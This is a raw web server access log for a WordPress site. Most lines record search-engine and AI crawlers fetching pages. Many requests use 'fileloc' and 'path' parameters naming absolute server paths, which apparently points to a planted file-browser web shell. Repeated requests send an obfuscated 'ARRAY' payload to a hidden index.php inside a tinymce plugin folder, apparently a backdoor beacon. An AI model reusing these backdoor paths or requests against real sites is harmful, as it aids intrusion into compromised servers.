172.69.7.47 - - [06/Dec/2025:05:17:57 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fpost-thumbnail-template.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 27507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.7.47 - - [06/Dec/2025:05:18:00 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Frequest-uri_too_long.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.7.47 - - [06/Dec/2025:05:18:03 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Ftheme-compat HTTP/1.0" 200 31542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.159.106.42 - - [06/Dec/2025:05:18:03 +0100] "GET /?f=1318543555 HTTP/1.0" 200 322025 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.116 - - [06/Dec/2025:05:18:06 +0100] "GET /?f=3673556323 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:18:06 +0100] "GET /?f=2224469991 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.98 - - [06/Dec/2025:05:18:07 +0100] "GET /?f=1445415573 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.17.106 - - [06/Dec/2025:05:18:08 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fnot_found.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.22.116 - - [06/Dec/2025:05:18:09 +0100] "GET /?f=1580358056 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.32 - - [06/Dec/2025:05:18:11 +0100] "GET /?f=2374269223 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.17.106 - - [06/Dec/2025:05:18:11 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-content%2Fwpvivid_staging HTTP/1.0" 200 18293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.246.197 - - [06/Dec/2025:05:16:12 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383137322p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343537322q6664663033333837636164333434616437323330323966633662343565353265222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.68.70.197 - - [06/Dec/2025:05:18:13 +0100] "GET /?f=2013478311 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.41 - - [06/Dec/2025:05:18:13 +0100] "GET /?f=2896601168 HTTP/1.0" 200 203928 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
172.69.17.106 - - [06/Dec/2025:05:18:14 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-content%2Fthemes HTTP/1.0" 200 27226 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.166.41 - - [06/Dec/2025:05:18:15 +0100] "GET /?f=755436523 HTTP/1.0" 200 199167 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.32 - - [06/Dec/2025:05:18:16 +0100] "GET /?f=4058298857 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.17.106 - - [06/Dec/2025:05:18:17 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fpomo HTTP/1.0" 200 27763 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.17.106 - - [06/Dec/2025:05:18:20 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fembed-template.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 16562 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:18:26 +0100] "GET /?f=2945810673 HTTP/1.0" 200 212744 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.32 - - [06/Dec/2025:05:18:32 +0100] "GET /?o=55536260071730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.251.100 - - [06/Dec/2025:05:16:33 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383139332p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343539332q6132376164333034373764666533633531383933646461396265663032633635222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.23.245.112 - - [06/Dec/2025:05:18:34 +0100] "GET /?f=2610619799 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:18:35 +0100] "GET /?f=2148603614 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:18:38 +0100] "GET /?f=851542961 HTTP/1.0" 200 215175 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.245.112 - - [06/Dec/2025:05:18:40 +0100] "GET /?f=695011527 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.70.197 - - [06/Dec/2025:05:18:41 +0100] "GET /?f=2657934875 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.70.197 - - [06/Dec/2025:05:18:45 +0100] "GET /?o=66120457121730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:18:49 +0100] "GET /?f=356432425 HTTP/1.0" 200 209046 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.131.185 - - [06/Dec/2025:05:18:50 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.trash%2Fwp-content HTTP/1.0" 200 17977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.23.245.112 - - [06/Dec/2025:05:18:50 +0100] "GET /?f=2501977448 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:18:51 +0100] "GET /?o=103019799011730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.131.185 - - [06/Dec/2025:05:18:52 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2F.composer%2Fcache HTTP/1.0" 200 19524 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.23.239.81 - - [06/Dec/2025:05:16:54 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383231342p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343631342q3362326236323235636562613736613838373339623637386537666633396533222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.70.131.185 - - [06/Dec/2025:05:18:55 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fserver.svg&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 24701 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.131.185 - - [06/Dec/2025:05:18:58 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fstyles.css&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 18830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:19:01 +0100] "GET /?f=3461795481 HTTP/1.0" 200 208750 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.131.185 - - [06/Dec/2025:05:19:01 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fbookmark.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 34141 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.22.116 - - [06/Dec/2025:05:19:04 +0100] "GET /?f=2041018196 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.184 - - [06/Dec/2025:05:19:04 +0100] "GET /?o=61800912061730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:19:05 +0100] "GET /?f=1520405109 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.254.199 - - [06/Dec/2025:05:19:07 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fcertificates HTTP/1.0" 200 18300 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.254.199 - - [06/Dec/2025:05:19:10 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fcomment.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 163638 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.70.197 - - [06/Dec/2025:05:19:12 +0100] "GET /?f=3240864139 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.70.197 - - [06/Dec/2025:05:19:12 +0100] "GET /?f=2725694374 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:19:12 +0100] "GET /?f=2939485273 HTTP/1.0" 200 217770 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.254.199 - - [06/Dec/2025:05:19:13 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-smtp.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 16697 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.144.16 - - [06/Dec/2025:05:17:15 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383233352p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343633352q3833333363356234323763636130376162393632623632336131376666306532222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.254.199 - - [06/Dec/2025:05:19:16 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fcron.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 61781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.254.199 - - [06/Dec/2025:05:19:19 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-locale-switcher.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 23197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.70.197 - - [06/Dec/2025:05:19:21 +0100] "GET /?f=661653484 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:19:21 +0100] "GET /?o=33163379041730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:19:22 +0100] "GET /?f=3993198686 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:19:22 +0100] "GET /?f=3263907737 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:19:24 +0100] "GET /?f=1494465322 HTTP/1.0" 200 217184 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.27.161 - - [06/Dec/2025:05:19:25 +0100] "GET /sitemap-subkey-2119.xml HTTP/1.0" 200 160082 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.70.197 - - [06/Dec/2025:05:19:26 +0100] "GET /?f=2244707754 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.184 - - [06/Dec/2025:05:19:30 +0100] "GET /?f=2766436625 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:19:34 +0100] "GET /?f=4102725081 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.172.203 - - [06/Dec/2025:05:17:36 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383235362p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343635362q6166653137393863663164656662303631623732343562393238666237323037222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.68.27.161 - - [06/Dec/2025:05:19:35 +0100] "GET /?f=1276542679 HTTP/1.0" 200 205461 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.245.112 - - [06/Dec/2025:05:19:38 +0100] "GET /?f=2072690540 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.43 - - [06/Dec/2025:05:19:41 +0100] "GET /?f=914248176 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:19:47 +0100] "GET /?f=1215541942 HTTP/1.0" 200 196616 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.100.5 - - [06/Dec/2025:05:19:48 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fms-load.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 38036 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.100.5 - - [06/Dec/2025:05:19:50 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-role.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 18756 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.100.5 - - [06/Dec/2025:05:19:53 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fcanonical.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 57504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.240.208 - - [06/Dec/2025:05:17:57 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383237372p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343637372q3761626537396130623066353162323931313362373664663731616239383334222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.70.100.5 - - [06/Dec/2025:05:19:56 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-tax-query.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 38546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.100.5 - - [06/Dec/2025:05:19:59 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fnav-menu-template.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 44965 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.100.5 - - [06/Dec/2025:05:20:02 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fquery.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 55211 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.30.98 - - [06/Dec/2025:05:20:05 +0100] "GET /?f=1229582102 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.100.5 - - [06/Dec/2025:05:20:05 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Frevision.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 49389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
108.162.238.43 - - [06/Dec/2025:05:20:08 +0100] "GET /?f=2319701305 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.100.5 - - [06/Dec/2025:05:20:08 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fdate.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 16624 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.166.40 - - [06/Dec/2025:05:20:08 +0100] "GET /?f=1792597776 HTTP/1.0" 200 221135 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.100.5 - - [06/Dec/2025:05:20:11 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-pop3.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 39674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
108.162.238.43 - - [06/Dec/2025:05:20:15 +0100] "GET /?f=4161232329 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.222.193 - - [06/Dec/2025:05:18:18 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939383239382p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343639382q6133363766366334343462373962643165393730363636626135636439653734222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.30.98 - - [06/Dec/2025:05:20:18 +0100] "GET /?f=4230096769 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.40 - - [06/Dec/2025:05:20:20 +0100] "GET /?f=833657383 HTTP/1.0" 200 204189 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.166.40 - - [06/Dec/2025:05:20:21 +0100] "GET /?f=1931836897 HTTP/1.0" 200 232090 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.22.116 - - [06/Dec/2025:05:20:23 +0100] "GET /?f=356797 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:20:26 +0100] "GET /?f=3463306585 HTTP/1.0" 200 209810 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.33 - - [06/Dec/2025:05:20:28 +0100] "GET /?o=62595916001730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.254.199 - - [06/Dec/2025:05:20:31 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-duotone.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 60806 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
